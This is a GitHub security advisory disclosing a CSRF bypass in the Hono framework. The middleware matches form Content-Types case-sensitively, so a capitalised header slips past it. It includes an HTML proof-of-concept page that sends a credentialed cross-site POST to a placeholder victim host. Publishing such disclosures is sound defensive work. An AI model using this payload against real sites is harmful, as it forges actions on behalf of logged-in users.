GHSA-rpfr-3m35-5vx5
Hono CSRF middleware can be bypassed using crafted Content-Type header
Details
### Summary
Hono CSRF middleware can be bypassed using crafted Content-Type header.
### Details
MIME types are case insensitive, but `isRequestedByFormElementRe` only matches lower-case.
https://github.com/honojs/hono/blob/b0af71fbcc6dbe44140ea76f16d68dfdb32a99a0/src/middleware/csrf/index.ts#L16-L17
As a result, attacker can bypass csrf middleware using upper-case form-like MIME type, such as "Application/x-www-form-urlencoded".
### PoC
```html <html> <head> <title>CSRF Test</title> <script defer> document.addEventListener("DOMContentLoaded", () => { document.getElementById("btn").addEventListener("click", async () => { const res = await fetch("http://victim.example.com/test", { method: "POST", credentials: "include", headers: { "Content-Type": "Application/x-www-form-urlencoded", }, }); }); }); </script> </head> <body> <h1>CSRF Test</h1> <button id="btn">Click me!</button> </body> </html> ```
### Impact
Bypass csrf protection implemented with hono csrf middleware.
### Discussion
I'm not sure that omitting csrf checks for Simple POST request is a good idea. CSRF prevention and CORS are different concepts even though CORS can prevent CSRF in some cases.
Are you affected?
Enter the version of the package you're using.
Affected packages
References
- https://github.com/honojs/hono/security/advisories/GHSA-rpfr-3m35-5vx5 [WEB]
- https://nvd.nist.gov/vuln/detail/CVE-2024-43787 [ADVISORY]
- https://github.com/honojs/hono/commit/41ce840379516410dee60c783142e05bb5a22449 [WEB]
- https://github.com/honojs/hono [PACKAGE]
- https://github.com/honojs/hono/blob/b0af71fbcc6dbe44140ea76f16d68dfdb32a99a0/src/middleware/csrf/index.ts#L16-L17 [WEB]